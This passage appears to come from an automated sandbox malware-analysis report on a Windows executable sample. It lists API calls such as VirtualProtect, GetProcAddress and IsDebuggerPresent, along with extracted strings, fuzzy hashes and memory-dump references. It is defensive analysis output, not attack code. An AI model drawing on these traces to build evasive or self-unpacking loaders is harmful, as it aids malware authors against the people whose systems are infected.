            • Opcode ID: fc36916680a086c88124d90a4592832c28db1b59063f3f73315290ae9dd54dd7
            • Instruction ID: fad71f1b8a4a2a1da64ce0c36700f5f789e7a6b1f0d88a2282ef5a2c6481e75d
            • Opcode Fuzzy Hash: fc36916680a086c88124d90a4592832c28db1b59063f3f73315290ae9dd54dd7
            • Instruction Fuzzy Hash: 25212B31E02795ABCB319B66AC44A6B375CAF41FB4F140120EB01AB291DB34ED00E6D0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetCurrentProcess.KERNEL32(?,?,00FE0095,00000000,00FDA712,?,?,6FA3B488,00FDA712,?), ref: 00FE00AC
            • TerminateProcess.KERNEL32(00000000,?,00FE0095,00000000,00FDA712,?,?,6FA3B488,00FDA712,?), ref: 00FE00B3
            • ExitProcess.KERNEL32 ref: 00FE00C5
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Process$CurrentExitTerminate
            • String ID:
            • API String ID: 1703294689-0
            • Opcode ID: 310b08f7824decb95b65952e8cd231a218c264f01ffba10298326b9e1d5c0f0e
            • Instruction ID: 7293f04a455d6c82f7d84c1273ac30abab8210eac1fe76d7d6a5a8cc4d239e82
            • Opcode Fuzzy Hash: 310b08f7824decb95b65952e8cd231a218c264f01ffba10298326b9e1d5c0f0e
            • Instruction Fuzzy Hash: DBD06735000244ABCB252F61DC0D95A3F66BB40391B058010B9495D126DFBE9992EB80
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 28 fd3d0a-fd3d2e VirtualProtect call fd3062 30 fd3d33-fd3d52 call fd3048 28->30
            APIs
            • VirtualProtect.KERNELBASE(0104FC18,000004AC,00000040,00000000), ref: 00FD3D26
              • Part of subcall function 00FD3062: OpenIcon.USER32(00000000), ref: 00FD307C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: IconOpenProtectVirtual
            • String ID: MZx
            • API String ID: 1301268471-2575928145
            • Opcode ID: a68227b55117833a9c2eaef0330544ca4cd6848b109c9fe40c65272283033a29
            • Instruction ID: bd41162a38483a6b825e24a2a45641ea35fc5e812a5bfc2ddf52f00ca5ff873a
            • Opcode Fuzzy Hash: a68227b55117833a9c2eaef0330544ca4cd6848b109c9fe40c65272283033a29
            • Instruction Fuzzy Hash: 42E0D8B390512477D710A255ED09ECF365DCFC2765F144035F604A6182D92D8F0593FD
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 34 fe52b6-fe52de 35 fe52e4-fe52e6 34->35 36 fe52e0-fe52e2 34->36 38 fe52ec-fe52f3 call fe51eb 35->38 39 fe52e8-fe52ea 35->39 37 fe5335-fe5338 36->37 41 fe52f8-fe52fc 38->41 39->37 42 fe52fe-fe530c GetProcAddress 41->42 43 fe531b-fe5332 41->43 42->43 44 fe530e-fe5319 call fdf81c 42->44 45 fe5334 43->45 44->45 45->37
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 710d11dafc5145641be82d36f3f769dacfe5bcd18614fae14d72d8d1c90fcfa7
            • Instruction ID: fc9bb18da068624630b4a863a0ad633919622fe15e7aa9ef34ac30331679a8f7
            • Opcode Fuzzy Hash: 710d11dafc5145641be82d36f3f769dacfe5bcd18614fae14d72d8d1c90fcfa7
            • Instruction Fuzzy Hash: 6301D433B00A655F9F168E6AEC40A6A339BBFC5B747248125FA15DB198DE34D802F790
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: __floor_pentium4
            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
            • API String ID: 4168288129-2761157908
            • Opcode ID: f794d88ee03878774cf39c7ff9137f1051b16e9224f75b87c3e79b415d9331b5
            • Instruction ID: d102bec0963308256652df94941aec13f3e5e1c4a1cc89af815ddf25af4f0792
            • Opcode Fuzzy Hash: f794d88ee03878774cf39c7ff9137f1051b16e9224f75b87c3e79b415d9331b5
            • Instruction Fuzzy Hash: 40D22872E082688FDB25CE29DD407EAB7B5EB44314F1441EAD40EE7640EB78AE859F41
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: H\UK$MTDC$^A$k^PW$k^PW$p,J^$(
            • API String ID: 0-2897112414
            • Opcode ID: 4cb1d2a139421ae9cb281e9413b061bf2fe9187673c0a3fa46b425bfb9b1e7e3
            • Instruction ID: 07b566116d808cd9be17a510a3edba2c414ed431ac64d3689bc05e8bc9dfc0f4
            • Opcode Fuzzy Hash: 4cb1d2a139421ae9cb281e9413b061bf2fe9187673c0a3fa46b425bfb9b1e7e3
            • Instruction Fuzzy Hash: 51C138B110C3818FE365CF18C4947ABBBE1BF82354F14895DE4E59B292C779990ACB93
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetLocaleInfoW.KERNEL32(?,2000000B,00FEC507,00000002,00000000,?,?,?,00FEC507,?,00000000), ref: 00FEC282
            • GetLocaleInfoW.KERNEL32(?,20001004,00FEC507,00000002,00000000,?,?,?,00FEC507,?,00000000), ref: 00FEC2AB
            • GetACP.KERNEL32(?,?,00FEC507,?,00000000), ref: 00FEC2C0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID: ACP$OCP
            • API String ID: 2299586839-711371036
            • Opcode ID: 0e1e7a26bdb26175bfa8c71feb4fd7ac4a8ecef6ad1b68ed65a145e85e310969
            • Instruction ID: 827aabb81bda68c62f15f76acfa3f4e995fc1d03daadacc1bd2f10064284ccfc
            • Opcode Fuzzy Hash: 0e1e7a26bdb26175bfa8c71feb4fd7ac4a8ecef6ad1b68ed65a145e85e310969
            • Instruction Fuzzy Hash: 8921A472E00285A6DB309FD6C900B97B3A6EB54F70B168564FB4ADB215E732DD42E3D0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00FE2A40: GetLastError.KERNEL32(?,00000008,00FE879F,00000000,00FDA890), ref: 00FE2A44
              • Part of subcall function 00FE2A40: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FE2AE6
            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00FEC4CA
            • IsValidCodePage.KERNEL32(00000000), ref: 00FEC513
            • IsValidLocale.KERNEL32(?,00000001), ref: 00FEC522
            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00FEC56A
            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00FEC589
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
            • String ID:
            • API String ID: 415426439-0
            • Opcode ID: 0472d556fe098f355dbb2def2cfaf4a0ab01750be241853703b44c18f65b45f7
            • Instruction ID: b385186ac13a71bc639a11d85e83b2e1c21ce0bfd373309d8698897c104d0033
            • Opcode Fuzzy Hash: 0472d556fe098f355dbb2def2cfaf4a0ab01750be241853703b44c18f65b45f7
            • Instruction Fuzzy Hash: 4C518472D002499FDB20EFA6CC51ABF77B8FF04710F144469F514EB191EB749905A7A1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: _strrchr
            • String ID:
            • API String ID: 3213747228-0
            • Opcode ID: 957b6a68e01d3e16632ce3fb5a3ba364fe60901d2c6598131793219a536d9919
            • Instruction ID: 9947b05658a81dc8df63d6367ea08804812b1c36d46eb90a375de2f977e9b4e4
            • Opcode Fuzzy Hash: 957b6a68e01d3e16632ce3fb5a3ba364fe60901d2c6598131793219a536d9919
            • Instruction Fuzzy Hash: E3B14632D042859FDF15CF69C8817EEBBA5EF55310F1481AEE614AB241D239ED41E7A0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00FE9047
            • FindNextFileW.KERNEL32(00000000,?), ref: 00FE913B
            • FindClose.KERNEL32(00000000), ref: 00FE917A
            • FindClose.KERNEL32(00000000), ref: 00FE91AD
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: Find$CloseFile$FirstNext
            • String ID:
            • API String ID: 1164774033-0
            • Opcode ID: 1bfe5380c93ca764cd592b887d1d4d6a7c06f9075927841393ce3d4e25373b62
            • Instruction ID: b74528440c95f8e520d16ab5b9c8af1dc13dcfe41cc1da2bc784ed97f1c85565
            • Opcode Fuzzy Hash: 1bfe5380c93ca764cd592b887d1d4d6a7c06f9075927841393ce3d4e25373b62
            • Instruction Fuzzy Hash: ED711471C091D95FDF30AF3A8C8DAAAB7B9AF05350F1441D9E44CA7211DA398E85AF20
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00FD67E9
            • IsDebuggerPresent.KERNEL32 ref: 00FD68B5
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FD68CE
            • UnhandledExceptionFilter.KERNEL32(?), ref: 00FD68D8
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
            • String ID:
            • API String ID: 254469556-0
            • Opcode ID: 14624d4273060c65baa81dcf6f69ffa8f6a04f12a4d88a525cac19fb97396f97
            • Instruction ID: 94f5d1aa98690a3cea0345bc05fe1b08836281d1c437c9ba5ab81f998b4d3f52
            • Opcode Fuzzy Hash: 14624d4273060c65baa81dcf6f69ffa8f6a04f12a4d88a525cac19fb97396f97
            • Instruction Fuzzy Hash: 8C31F975D053199BDB21EFA4D9497CDBBB8BF08340F1041EAE40CAB240EB759A85DF45
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00FE2A40: GetLastError.KERNEL32(?,00000008,00FE879F,00000000,00FDA890), ref: 00FE2A44
              • Part of subcall function 00FE2A40: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FE2AE6
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEBEC1
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEBF0B
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FEBFD1
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: InfoLocale$ErrorLast
            • String ID:
            • API String ID: 661929714-0
            • Opcode ID: 47d8c5c30eddd8ef322b62d6320cb7c234539ee53ceb4d2ec939817328341580
            • Instruction ID: 5ec33c51a42fd444569b56051279065b930ea2ee55a3b0d40ac18a9851c23b07
            • Opcode Fuzzy Hash: 47d8c5c30eddd8ef322b62d6320cb7c234539ee53ceb4d2ec939817328341580
            • Instruction Fuzzy Hash: E2619172900287DFDB289F26CD82B7A77A8FF44350F104179FA09C6195EB78D952EB90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FDA80B
            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FDA815
            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FDA822
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: 8b66aedbff9b59b47f482940a7a098e861c8011f6f9265c44c06f9db8a6890ce
            • Instruction ID: 900acb413ad2a14330cedc798cda65146f1048b212eac945e2854a90c848c3e7
            • Opcode Fuzzy Hash: 8b66aedbff9b59b47f482940a7a098e861c8011f6f9265c44c06f9db8a6890ce
            • Instruction Fuzzy Hash: 5831D3749013299BCB21EF64D88978DBBB9BF08710F5441EAE41CAB250E7749F819F45
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: 7452$R-,T$R-,T
            • API String ID: 0-4083704330
            • Opcode ID: 6033a5dfcd4f86ac96b9042f88b6cb1ab17033edb70b5824f2557b155d135cd1
            • Instruction ID: 5c02640ff78381c65f022afc470d89102b551b8d5db30c665e7ce13ac741d53e
            • Opcode Fuzzy Hash: 6033a5dfcd4f86ac96b9042f88b6cb1ab17033edb70b5824f2557b155d135cd1
            • Instruction Fuzzy Hash: 08B1CA726143128BD714CF58C490A6BBBE6FFC8710F988A6CE9C69B351C370E845CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cf5c6875ad8b9aa219ef09fa5f3f671408767bcd021872790bb57096a96beff6
            • Instruction ID: c02b7491466af401cca765c737eaffca4dba2f395e7a559e2a9f8da3166f5d06
            • Opcode Fuzzy Hash: cf5c6875ad8b9aa219ef09fa5f3f671408767bcd021872790bb57096a96beff6
            • Instruction Fuzzy Hash: 72F14375E002199FDF14CF68D880AADB7B2FF88324F19826AD81AEB351D7319D45DB90
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID:
            • String ID: onqp
            • API String ID: 0-1718216680
            • Opcode ID: 258e04d024308f171ac57c8b24aa6887184ff6dfbdab949e4a084a17ed4ecae3
            • Instruction ID: 14066e56e9343d24b3b46e64ba85549cc4e3f5576dd7a8018d774dce3c831a7a
            • Opcode Fuzzy Hash: 258e04d024308f171ac57c8b24aa6887184ff6dfbdab949e4a084a17ed4ecae3
            • Instruction Fuzzy Hash: 363277706083418BE714CF18C890B2EBBE6BBC9314F188AAEF5D59B391D775D905CB82
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FE364E,?,?,00000008,?,?,00FF15F5,00000000), ref: 00FE3880
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: ExceptionRaise
            • String ID:
            • API String ID: 3997070919-0
            • Opcode ID: 3657cd5a9c4f39cea05e564c142df9cb2649108a8fddc6cb5ddb873cdf86a82f
            • Instruction ID: ef543bb8078d0c5db4336721b05d4425626246b8986c97131d92fd6ea8e64ba8
            • Opcode Fuzzy Hash: 3657cd5a9c4f39cea05e564c142df9cb2649108a8fddc6cb5ddb873cdf86a82f
            • Instruction Fuzzy Hash: 5BB18D76610648DFD718CF29C48EB657BE1FF05364F258658E89ACF2A1C335EA82DB40
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FD64D2
            Memory Dump Source
            • Source File: 00000000.00000002.1600511112.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
            • Associated: 00000000.00000002.1600468674.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600531681.0000000000FF3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600549282.0000000000FFD000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600642803.000000000104F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600655464.0000000001051000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1600666375.0000000001053000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fd0000_SecuriteInfo.jbxd
            Similarity
            • API ID: FeaturePresentProcessor
            • String ID:
            • API String ID: 2325560087-0
            • Opcode ID: 149ec19c52e862760b93606ca24d5b8729b760d583484a95c2d5316f22afb8e2
            • Instruction ID: 58eb8a3e72ec09c8410fa3e37aa1104474d6a294cd043f86269f18be1255e75f
            • Opcode Fuzzy Hash: 149ec19c52e862760b93606ca24d5b8729b760d583484a95c2d5316f22afb8e2
